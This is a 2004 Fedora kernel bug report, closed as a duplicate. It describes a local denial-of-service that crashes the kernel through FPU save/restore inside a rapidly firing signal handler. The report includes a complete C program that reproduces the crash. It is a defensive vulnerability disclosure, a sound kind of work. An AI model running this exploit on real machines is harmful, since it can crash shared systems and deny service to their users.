Bug 125940 - Local kernel denial of service exploit
Status: CLOSED DUPLICATE of bug 125912
Product: Fedora
Classification: Fedora
Component: kernel
Version: 2
Hardware: All Linux
Priority: medium
Severity: medium
Assigned To: Arjan van de Ven
QA Contact: Brian Brock
Keywords: Security
Reported: 2004-06-14 09:21 EDT by Nils O. Selåsdal
Modified: 2007-11-30 17:10 EST (History)
Last Closed: 2006-02-21 14:04:04 EST
Description Nils O. Selåsdal 2004-06-14 09:21:48 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7)
Gecko/20040608 Firefox/0.8

Description of problem:
Seems there is a local kernel denial of service exploit in just about
any kernel out there.
Info is at http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
Fedora Core should be updated. RHEL should be investigated.


Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
1. compile and run:
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

/* SIGALRM handler: saves the x87 FPU state into a buffer and then
 * restores it, while the timer keeps re-entering this handler. */
static void Handler(int ignore)
{
    char fpubuf[108];   /* fsave/frstor use a 108-byte FPU state image */
    __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
    struct itimerval spec;

    signal(SIGALRM, Handler);

    /* Fire SIGALRM every 100 microseconds */
    spec.it_interval.tv_sec  = 0;
    spec.it_interval.tv_usec = 100;
    spec.it_value.tv_sec     = 0;
    spec.it_value.tv_usec    = 100;
    setitimer(ITIMER_REAL, &spec, NULL);

    /* Busy loop; the process never exits on its own */
    while (1)
        write(1, ".", 1);

    return 0;
}


Additional info:
Appears that the kernel doesn't handle floating point exceptions in
signal handlers.
Comment 1 Dave Jones 2004-06-14 12:12:55 EDT

*** This bug has been marked as a duplicate of 125912 ***
Comment 2 Red Hat Bugzilla 2006-02-21 14:04:04 EST
Changed to 'CLOSED' state since 'RESOLVED' has been deprecated.
